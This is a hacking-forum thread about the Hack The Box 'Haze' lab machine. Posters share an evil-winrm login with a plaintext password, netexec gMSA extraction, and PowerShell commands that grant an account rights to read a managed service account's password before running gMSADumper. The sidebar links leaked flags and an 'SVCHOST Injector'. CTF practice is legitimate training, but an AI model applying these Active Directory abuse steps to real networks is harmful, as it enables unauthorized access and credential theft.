Mar 29, 2025, 08:23 PM
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
|
Haze - Hack The Box Season 7 - Windows Hard
by ShitWhiffler - Saturday March 29, 2025 at 06:59 PM
|
|
Mar 29, 2025, 08:23 PM
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
Mar 29, 2025, 09:31 PM
did someone get anything?
Mar 29, 2025, 09:33 PM
besides mark.adams being in gMSA_Managers, nothing.
Mar 29, 2025, 09:53 PM
how did u get this password for paul ? seems uncrackable through hashcat
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Reposting hidden content for free
Mar 29, 2025, 09:55 PM
Mar 29, 2025, 10:05 PM
(Mar 29, 2025, 09:55 PM)pop10189 Wrote:(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing. I was not able to do that. Can you tell how?
Mar 29, 2025, 10:12 PM
(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:(Mar 29, 2025, 09:55 PM)pop10189 Wrote:(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing. look for GMSA section https://notes.qazeer.io/active-directory...exploiting Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa
Mar 29, 2025, 10:16 PM
(Mar 29, 2025, 10:12 PM)pop10189 Wrote:(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:(Mar 29, 2025, 09:55 PM)pop10189 Wrote:(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing. Account: Haze-IT-Backup$ NTLM: I literally got this as the hash no NTLM
Mar 29, 2025, 10:29 PM
(Mar 29, 2025, 10:16 PM)kyakeiuwu Wrote:(Mar 29, 2025, 10:12 PM)pop10189 Wrote:(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:(Mar 29, 2025, 09:55 PM)pop10189 Wrote:(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing. First you need to add your self as a member to read Gmsa
Mar 29, 2025, 10:39 PM
(Mar 29, 2025, 10:16 PM)kyakeiuwu Wrote:(Mar 29, 2025, 10:12 PM)pop10189 Wrote:(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:(Mar 29, 2025, 09:55 PM)pop10189 Wrote:(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing. Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams" $user = Get-ADUser -Identity "mark.adams" Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName then gMSADumper should work |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 386 | 96,329 |
3 hours ago Last Post: Sulk4685 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 49 | 3,930 |
7 hours ago Last Post: opium0221 |
||
| [FREE] CPTS 12 FLAGS | 87 | 3,378 |
Yesterday, 01:29 PM Last Post: darth_sidious |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 98 | 9,213 |
May 07, 2026, 08:05 PM Last Post: Zacker90 |
||
| SVCHOST Injector 2026 | 0 | 115 |
May 07, 2026, 01:41 PM Last Post: opsecmaster67 |
||